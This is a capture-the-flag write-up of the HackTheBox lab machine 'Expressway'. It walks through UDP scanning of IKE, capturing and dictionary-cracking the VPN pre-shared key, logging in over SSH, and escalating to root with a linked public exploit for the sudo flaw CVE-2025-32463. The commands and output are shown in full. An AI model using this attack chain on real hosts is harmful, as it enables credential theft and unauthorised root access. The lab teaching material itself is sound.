Post

HTB Expressway WriteUp

Posted Updated
Preview Image
By Rohit Anand
6 min read
HTB Expressway WriteUp

Author: Sierra0117

Enumeration

NMAP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27

❯ nmap -A -sU -p 500 expressway.htb
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-27 13:38 IST
Nmap scan report for expressway.htb (10.10.11.87)
Host is up (0.24s latency).

PORT    STATE SERVICE VERSION
500/udp open  isakmp?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port500-UDP:V=7.95%I=7%D=9/27%Time=68D79BAA%P=x86_64-pc-linux-gnu%r(IPS
SF:EC_START,9C,"1'\xfc\xb08\x10\x9e\x89,\x9aD\xdd\x80\xc5\x8a\x99\x01\x10\
SF:x02\0\0\0\0\0\0\0\0\x9c\r\0\x004\0\0\0\x01\0\0\0\x01\0\0\0\(\x01\x01\0\
SF:x01\0\0\0\x20\x01\x01\0\0\x80\x01\0\x05\x80\x02\0\x02\x80\x04\0\x02\x80
SF:\x03\0\x03\x80\x0b\0\x01\x80\x0c\x0e\x10\r\0\0\x0c\t\0&\x89\xdf\xd6\xb7
SF:\x12\r\0\0\x14\xaf\xca\xd7\x13h\xa1\xf1\xc9k\x86\x96\xfcwW\x01\0\r\0\0\
SF:x18@H\xb7\xd5n\xbc\xe8\x85%\xe7\xde\x7f\0\xd6\xc2\xd3\x80\0\0\0\0\0\0\x
SF:14\x90\xcb\x80\x91>\xbbin\x08c\x81\xb5\xecB{\x1f");
Too many fingerprints match this host to give specific OS details
Network Distance: 2 hops

TRACEROUTE (using port 500/udp)
HOP RTT       ADDRESS
1   207.74 ms 10.10.14.1
2   ... 30

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 140.58 seconds

Rustscan

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35

❯ rustscan --udp -a expressway.htb
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
To scan or not to scan? That is the question.

[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 10.10.11.87:500
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-27 13:41 IST
Initiating Ping Scan at 13:41
Scanning 10.10.11.87 [4 ports]
Completed Ping Scan at 13:41, 0.33s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 13:41
Scanning expressway.htb (10.10.11.87) [1 port]
Completed SYN Stealth Scan at 13:41, 0.23s elapsed (1 total ports)
Nmap scan report for expressway.htb (10.10.11.87)
Host is up, received reset ttl 63 (0.30s latency).
Scanned at 2025-09-27 13:41:49 IST for 0s

PORT    STATE  SERVICE REASON
500/tcp closed isakmp  reset ttl 63

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.67 seconds
           Raw packets sent: 5 (196B) | Rcvd: 2 (80B)

Ike-Scan

1
2
3
4
5

sudo ike-scan -A expressway.htb
Starting ike-scan 1.9.6 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.10.11.87     Aggressive Mode Handshake returned HDR=(CKY-R=2f3f8aad79517fc3) SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) KeyExchange(128 bytes) Nonce(32 bytes) ID(Type=ID_USER_FQDN, Value=ike@expressway.htb) VID=09002689dfd6b712 (XAUTH) VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0) Hash(20 bytes)

Ending ike-scan 1.9.6: 1 hosts scanned in 0.249 seconds (4.01 hosts/sec).  1 returned handshake; 0 returned notify

1
2
3
4
5

sudo ike-scan -A --pskcrack=ike_handshake.hash expressway.htb 
Starting ike-scan 1.9.6 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.10.11.87     Aggressive Mode Handshake returned HDR=(CKY-R=c36ad3d7e366241b) SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) KeyExchange(128 bytes) Nonce(32 bytes) ID(Type=ID_USER_FQDN, Value=ike@expressway.htb) VID=09002689dfd6b712 (XAUTH) VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0) Hash(20 bytes)

Ending ike-scan 1.9.6: 1 hosts scanned in 0.338 seconds (2.96 hosts/sec).  1 returned handshake; 0 returned notify

Getting The Hash

1
2

cat ike_handshake.hash 
31e160dac095eb3da37094a2955b1aa741d4219c000680ff1ced361641fa63cf18671f51cb3d7cfb738253f0d53f12d21ea543f5d4ea7e3fba4e01560514fd64e57a937f89007129f021eca010b2614d79a1622366c99c2c53057b45ed59c3ac2d5179519357db3829d618fd9dc011fa4c8cb4e7a8e482876ffc966a572f8a62:cf9d3881626018987e3ae3aed67f6356998a8d768725b5709ddf2dc5743320fdf67560ae2928676388b989938f1d33d6d11e694f1a2a18dfc28139700ecab715dd396dc268bebf0fe13a8e8faea5adff25db99bae1d2759a89917c340fd55ce90eab996f919c3112375031de1ecdf2e367244791f52b79167f6c72f3045b31fb:c36ad3d7e366241b:b301188e8cf386b0:00000001000000010000009801010004030000240101000080010005800200028003000180040002800b0001000c000400007080030000240201000080010005800200018003000180040002800b0001000c000400007080030000240301000080010001800200028003000180040002800b0001000c000400007080000000240401000080010001800200018003000180040002800b0001000c000400007080:03000000696b6540657870726573737761792e687462:d8142f082d795ead762da94a4dcbad84f6fe813e:9ca8b616c1dbac3967a443561380077441667d83d5491fe1f9ef9b7322f7b75c:589e0d79745a52455803e5c976c6ccda30893f1c

Cracking The Hash

1
2
3
4
5

❯ psk-crack -d /usr/share/wordlists/rockyou.txt ike_handshake.hash
Starting psk-crack [ike-scan 1.9.6] (http://www.nta-monitor.com/tools/ike-scan/)
Running in dictionary cracking mode
key "freakingrockstarontheroad" matches SHA1 hash 589e0d79745a52455803e5c976c6ccda30893f1c
Ending psk-crack: 8045040 iterations in 7.816 seconds (1029324.27 iterations/sec)

NetExec

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27

❯ nxc ssh expressway.htb -u 'ike' -p 'freakingrockstarontheroad'
[*] First time use detected
[*] Creating home directory structure
[*] Creating missing folder logs
[*] Creating missing folder modules
[*] Creating missing folder protocols
[*] Creating missing folder workspaces
[*] Creating missing folder obfuscated_scripts
[*] Creating missing folder screenshots
[*] Creating missing folder logs/sam
[*] Creating missing folder logs/lsa
[*] Creating missing folder logs/ntds
[*] Creating missing folder logs/dpapi
[*] Creating default workspace
[*] Initializing FTP protocol database
[*] Initializing LDAP protocol database
[*] Initializing MSSQL protocol database
[*] Initializing NFS protocol database
[*] Initializing RDP protocol database
[*] Initializing SMB protocol database
[*] Initializing SSH protocol database
[*] Initializing VNC protocol database
[*] Initializing WINRM protocol database
[*] Initializing WMI protocol database
[*] Copying default configuration file
SSH         10.10.11.87     22     expressway.htb   [*] SSH-2.0-OpenSSH_10.0p2 Debian-8
SSH         10.10.11.87     22     expressway.htb   [+] ike:freakingrockstarontheroad  Linux - Shell access!

User Flag

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22

❯ ssh ike@expressway.htb                                       
The authenticity of host 'expressway.htb (10.10.11.87)' can't be established.
ED25519 key fingerprint is SHA256:fZLjHktV7oXzFz9v3ylWFE4BS9rECyxSHdlLrfxRM8g.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'expressway.htb' (ED25519) to the list of known hosts.
ike@expressway.htb's password: 
Last login: Sat Sep 27 09:16:47 BST 2025 from 10.10.14.68 on ssh
Linux expressway.htb 6.16.7+deb14-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.16.7-1 (2025-09-11) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Sep 27 09:17:19 2025 from 10.10.14.68
ike@expressway:~$ ls
user.txt
ike@expressway:~$ cat user.txt 
1bbcd13904xxxxxxxxxxxxxxxxxxxxxxxx
ike@expressway:~$

Privilege Escalation

After getting the user flag, I started looking for ways to escalate my privileges. After some enumeration I found a sudo version bypass through linpeas.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19

╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-and-suid                                                   
strace Not Found                                                                                                                                  
-rwsr-xr-x 1 root root 1.5M Aug 14 12:58 /usr/sbin/exim4                                                                                          
-rwsr-xr-x 1 root root 1023K Aug 29 15:18 /usr/local/bin/sudo  --->  check_if_the_sudo_version_is_vulnerable
-rwsr-xr-x 1 root root 116K Aug 26 22:05 /usr/bin/passwd  --->  Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)                                                                                                                                             
-rwsr-xr-x 1 root root 75K Sep  9 10:09 /usr/bin/mount  --->  Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 87K Aug 26 22:05 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 91K Sep  9 10:09 /usr/bin/su
-rwsr-xr-x 1 root root 276K Jun 27  2023 /usr/bin/sudo  --->  check_if_the_sudo_version_is_vulnerable
-rwsr-xr-x 1 root root 63K Sep  9 10:09 /usr/bin/umount  --->  BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 70K Aug 26 22:05 /usr/bin/chfn  --->  SuSE_9.3/10
-rwsr-xr-x 1 root root 52K Aug 26 22:05 /usr/bin/chsh
-rwsr-xr-x 1 root root 19K Sep  9 10:09 /usr/bin/newgrp  --->  HP-UX_10.20
-rwsr-xr-- 1 root messagebus 51K Mar  8  2025 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 483K Aug 10 00:07 /usr/lib/openssh/ssh-keysign
-r-sr-xr-x 1 root root 14K Aug 28 09:04 /usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
-r-sr-xr-x 1 root root 15K Aug 28 09:04 /usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper


1
2
3
4
5
6
7

ike@expressway:~$ sudo -V
Sudo version 1.9.17
Sudoers policy plugin version 1.9.17
Sudoers file grammar version 50
Sudoers I/O plugin version 1.9.17
Sudoers audit plugin version 1.9.17
ike@expressway:~$

The exploit : https://raw.githubusercontent.com/junxian428/CVE-2025-32463/refs/heads/main/priv_esc.sh

Getting this on the machine and running it

1
2
3
4
5
6
7
8
9
10
11
12
13

ike@expressway:~$ ls
priv_esc.sh  user.txt
ike@expressway:~$ chmod u+x priv_esc.sh 
ike@expressway:~$ ls
priv_esc.sh  user.txt
ike@expressway:~$ ./priv_esc.sh 
woot!
root@expressway:/# ls
bin   dev  home        initrd.img.old  lib64       media  opt   root  sbin  sys  usr  vmlinuz
boot  etc  initrd.img  lib             lost+found  mnt    proc  run   srv   tmp  var  vmlinuz.old
root@expressway:/# cat /root/root.txt 
3964e5f8a6c52bxxxxxxxxxxxxxxxxxx
root@expressway:/#
HackTheBox, Writeups, Machines
htb privilege-escalation Linux
This post is licensed under CC BY 4.0 by the author.